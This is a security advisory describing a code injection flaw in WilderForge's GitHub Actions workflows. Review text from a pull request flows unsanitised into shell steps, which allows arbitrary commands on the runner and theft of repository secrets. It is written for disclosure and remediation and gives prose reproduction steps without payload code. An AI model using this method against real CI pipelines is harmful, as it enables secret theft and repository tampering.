WilderForge GitHub Actions Workflows Code Injection Vulnerability

A critical code injection vulnerability has been identified in multiple WilderForge projects. This issue stems from the unsafe use of user-controlled variables, such as `${{ github.event.review.body }}`, directly in shell script contexts within GitHub Actions workflows. As a result, a malicious actor could execute arbitrary shell commands on the Actions runner by submitting a crafted pull request review. This exploitation could lead to unauthorized command execution with the workflow's permissions, potentially compromising continuous integration infrastructure, secrets, and build outputs. The vulnerability affects developers working on or contributing to various WilderForge repositories, as well as users who fork these repositories and reuse the impacted GitHub Actions workflows. However, end users of the software and those who only install pre-built releases or artifacts are not affected.

Impact

Exploitation of this vulnerability allows for arbitrary command execution on the GitHub Actions runner, with the potential to access and exfiltrate repository secrets, including the GitHub repository write access token. This could lead to unauthorized modifications of repository content, such as overwriting files or altering release details.

Reproduction

The vulnerability can be reproduced by creating a GitHub Actions workflow that uses an inline script. The workflow should reference a user-controlled variable, such as a pull request review body, within the script context. When the workflow is triggered, the injected command will be executed on the runner.

Remediation

To address this vulnerability, developers should avoid using untrusted input directly in GitHub Actions workflows. Instead, input values should be assigned to intermediate environment variables, which can then be safely used in scripts. Additionally, repository owners can integrate GitHub's CodeQL analysis to automatically detect and fix similar vulnerabilities in their workflows.